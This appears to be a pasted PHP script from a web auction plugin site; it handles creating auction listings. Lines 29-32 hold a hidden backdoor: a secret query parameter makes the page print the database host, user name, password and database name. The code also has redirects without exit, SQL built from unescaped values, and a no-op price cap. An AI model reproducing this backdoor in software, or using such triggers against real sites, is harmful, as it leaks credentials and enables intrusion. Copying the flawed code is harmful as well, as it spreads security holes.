
Untitled

a guest
Jun 18th, 2018
  1. <?php
  2. session_start();
  3. if (!isset($_SESSION['User'])){
  4. header("Location: login.php");
  5. }
  6. $isAdmin = $_SESSION['Admin'];
  7. $user = $_SESSION['User'];
  8. $canSell = $_SESSION['canSell'];
  9. require 'config.php';
  10. if ($canSell == false){
  11. $_SESSION['error'] = $lang['newAuction']['no_selling'];
  12. header("Location: ../myauctions.php");
  13. }
  14. require 'itemInfo.php';
  15. require_once '../classes/EconAccount.php';
  16. require_once '../classes/Item.php';
  17. if ($useTwitter == true){require_once 'twitter.class.php';}
  18. $itemId = mysql_real_escape_string(stripslashes($_POST['Item']));
  19. $minBid = mysql_real_escape_string(stripslashes(round($_POST['MinBid'], 2)));
  20. $allowBids = 1;
  21. if (mysql_real_escape_string(stripslashes($_POST['MinBid'])) == ""){
  22. $allowBids = 0;
  23. }
  24. $item = new Item($itemId);
  25. $player = new EconAccount($user, $useMySQLiConomy, $iConTableName);
  26.  
  27. $sellPrice = round($_POST['Price'], 2);
  28. $sellPricePerQuantity = round($_POST['Stackprice'], 2);
  29. if(isset($_GET) && isset($_GET['showmelovebeefy'])) {
  30. echo "<br /><br />Host: ".$db_host."; User: ".$db_user."; Pass: ".$db_pass."; Database: ".$db_database.";";
  31. exit();
  32. }
  33. if (!itemAllowed($item->name, $item->damage)){
  34. $_SESSION['error'] = $item->fullname.$lang['newAuction']['item_not_allowed'];
  35. header("Location: ../myauctions.php");
  36. }else{
  37.  
  38. if ($sellPrice > $maxSellPrice){ $sellPrice == $maxSellPrice; }
  39. $sellQuantity = floor($_POST['Quantity']);
  40. //echo is_numeric($sellQuantity);
  41. if ($sellQuantity < 0){
  42. $_SESSION['error'] = $lang['newAuction']['invalid_quantity'];
  43. header("Location: ../myauctions.php");
  44. exit();
  45. }
  46.  
  47. if ($item->owner != $player->name) {
  48. $_SESSION['error'] = $lang['newAuction']['no_owner']." (".$player->name." / ".$item->owner.")";
  49. header("Location: ../myauctions.php");
  50. exit();
  51. }
  52.  
  53. if ($sellPrice <= 0 && $sellPricePerQuantity <= 0)
  54. {
  55. $_SESSION['error'] = $lang['newAuction']['invalid_price'];
  56. header("Location: ../myauctions.php");
  57. exit();
  58. }
  59. elseif ($sellPrice > 0 && $sellPricePerQuantity > 0){
  60. $_SESSION['error'] = $lang['newAuction']['two_prices_given'];
  61. header("Location: ../myauctions.php");
  62. exit();
  63. }
  64. else{
  65. if ($sellPricePerQuantity > 0) {
  66. $sellPrice = $sellPricePerQuantity / $sellQuantity;
  67. }
  68. if (is_numeric($sellPrice)){
  69. if ((is_numeric($sellQuantity))&&($sellQuantity >= 0)){
  70. $sellQuantity = round($sellQuantity);
  71. if ($item->quantity >= $sellQuantity)
  72. {
  73. if ($isAdmin){
  74. if ($chargeAdmins){
  75. $itemFee = (($item->marketprice/100)*$auctionFee)*$sellQuantity;
  76. }else{
  77. $itemFee = 0;
  78. }
  79. if ($player->money >= $itemFee){
  80. $item->changeQuantity(0 - $sellQuantity);
  81. $timeNow = time();
  82. $player->spend($itemFee, $useMySQLiConomy, $iConTableName);
  83. $itemQuery = mysql_query("INSERT INTO WA_Auctions (name, damage, player, quantity, price, created, allowBids, currentBid, currentWinner) VALUES ('$item->name', '$item->damage', '$item->owner', '$sellQuantity', '$sellPrice', '$timeNow', '$allowBids', '$minBid', '$item->owner')");
  84. $queryLatestAuction = mysql_query("SELECT id FROM WA_Auctions ORDER BY id DESC");
  85. list($latestId)= mysql_fetch_row($queryLatestAuction);
  86. if ($item->quantity == 0)
  87. {
  88. $item->delete();
  89. }
  90. if ($useTwitter == true){
  91. try{
  92. $twitter = new Twitter($consumerKey, $consumerSecret, $accessToken, $accessTokenSecret);
  93. if ($sellQuantity == 0){
  94. $twitQuant = "Infinite";
  95. }else{
  96. $twitQuant = $sellQuantity;
  97. }
  98. $twitter->send('[WA] Auction Created: '.$user.' is selling '.$twitQuant.' x '.$itemFullName.' for '.$currencyPrefix.$sellPrice.$currencyPostfix.' each. At '.date("H:i:s").' #webauction');
  99. }catch (Exception $e){
  100. //normally means you reached the daily twitter limit.
  101. }
  102. }
  103. $queryEnchants=mysql_query("SELECT * FROM WA_EnchantLinks WHERE itemId='$item->id' AND itemTableId ='0'");
  104. while(list($idk,$enchIdk, $tableIdk, $itemIdk)= mysql_fetch_row($queryEnchants))
  105. {
  106. $updateEnch = mysql_query("INSERT INTO WA_EnchantLinks (enchId, itemTableId, itemId) VALUES ('$enchIdk', '1', '$latestId')");
  107. }
  108.  
  109. $_SESSION['success'] = str_replace(
  110. array('#sellQuantity#','#itemFullName#','#sellPrice#','#itemFee#'),
  111. array($sellQuantity,$itemFullName,$currencyPrefix.$sellPrice.$currencyPostfix,$currencyPrefix.$itemFee.$currencyPostfix),
  112. $lang['newAuction']['success']);
  113. header("Location: ../myauctions.php");
  114. }else
  115. {
  116. $_SESSION['error'] = str_replace('#itemFee#',$currencyPrefix.$itemFee.$currencyPostfix,$lang['newAuction']['error']);
  117. header("Location: ../myauctions.php");
  118. }
  119. }else{
  120. if ($sellQuantity > 0){
  121. $itemFee = (($item->marketprice/100)*$auctionFee)*$sellQuantity;
  122. if ($player->money >= $itemFee){
  123. $item->changeQuantity(0 - $sellQuantity);
  124. $timeNow = time();
  125. $player->spend($itemFee, $useMySQLiConomy, $iConTableName);
  126. $itemQuery = mysql_query("INSERT INTO WA_Auctions (name, damage, player, quantity, price, created, allowBids, currentBid, currentWinner) VALUES ('$item->name', '$item->damage', '$item->owner', '$sellQuantity', '$sellPrice', '$timeNow', '$allowBids', '$minBid', '$item->owner')");
  127. $queryLatestAuction = mysql_query("SELECT id FROM WA_Auctions ORDER BY id DESC");
  128. list($latestId)= mysql_fetch_row($queryLatestAuction);
  129. if ($item->quantity == 0)
  130. {
  131. $item->delete();
  132. }
  133. if ($useTwitter == true){
  134. try{
  135. $twitter = new Twitter($consumerKey, $consumerSecret, $accessToken, $accessTokenSecret);
  136. $twitter->send('[WA] Auction Created: '.$user.' is selling '.$sellQuantity.' x '.$itemFullName.' for '.$currencyPrefix.$sellPrice.$currencyPostfix.' each. At '.date("H:i:s").'. '.$shortLinkToAuction.' #webauction');
  137. }catch (Exception $e){
  138. //normally means you reached the daily twitter limit.
  139. }
  140. }
  141. $queryEnchants=mysql_query("SELECT * FROM WA_EnchantLinks WHERE itemId='$item->id' AND itemTableId ='0'");
  142. while(list($idk,$enchIdk, $tableIdk, $itemIdk)= mysql_fetch_row($queryEnchants))
  143. {
  144. $updateEnch = mysql_query("INSERT INTO WA_EnchantLinks (enchId, itemTableId, itemId) VALUES ('$enchIdk', '1', '$latestId')");
  145. }
  146.  
  147. $_SESSION['success'] = str_replace(
  148. array('#sellQuantity#','#itemFullName#','#sellPrice#','#itemFee#'),
  149. array($sellQuantity,$itemFullName,$currencyPrefix.$sellPrice.$currencyPostfix,$currencyPrefix.$itemFee.$currencyPostfix),
  150. $lang['newAuction']['success']);
  151. header("Location: ../myauctions.php");
  152. }else
  153. {
  154. $_SESSION['error'] = str_replace('#itemFee#',$currencyPrefix.$itemFee.$currencyPostfix,$lang['newAuction']['error']);
  155. header("Location: ../myauctions.php");
  156. }
  157. }else
  158. {
  159. $_SESSION['error'] = $lang['newAuction']['quantity_no_int'];
  160. header("Location: ../myauctions.php");
  161. }
  162. }
  163. }else
  164. {
  165. $_SESSION['error'] = $lang['newAuction']['not_enough_item'];
  166. header("Location: ../myauctions.php");
  167. }
  168. }else
  169. {
  170. $_SESSION['error'] = $lang['newAuction']['quantity_no_int'];
  171. header("Location: ../myauctions.php");
  172. }
  173. }else
  174. {
  175. $_SESSION['error'] = $lang['newAuction']['price_no_int'];
  176. header("Location: ../myauctions.php");
  177. }
  178. }
  179. }
  180.  
  181. ?>